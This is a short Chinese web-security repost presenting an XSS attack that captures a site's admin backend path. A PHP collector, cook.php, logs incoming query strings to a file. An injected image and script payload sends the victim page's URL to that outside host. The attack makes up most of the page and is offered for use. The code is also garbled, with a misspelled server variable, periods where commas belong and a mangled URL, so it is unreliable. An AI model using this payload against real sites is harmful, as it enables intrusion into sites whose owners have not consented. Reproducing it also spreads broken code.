XSS截获网站后台路径脚本 - 网站安全 - 自学php

cook.php

<? $info = $_SERVER['QUSEY_STRING']; if ($info) { $fp = fopen("info.txt"."a"); fwrite($fp.$info."\n"); fclose($fp); } ?>

使用代码：

插入:

<img name="ak" width=0 height=0 border=0></img><script>document.ak.src=" http://HdhCmsTest2cto测试数据 /cook.php?"+ windows .location.href;</script>

转自：bai度id已禁 blog

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11486

更新时间：2022-09-13 阅读：53次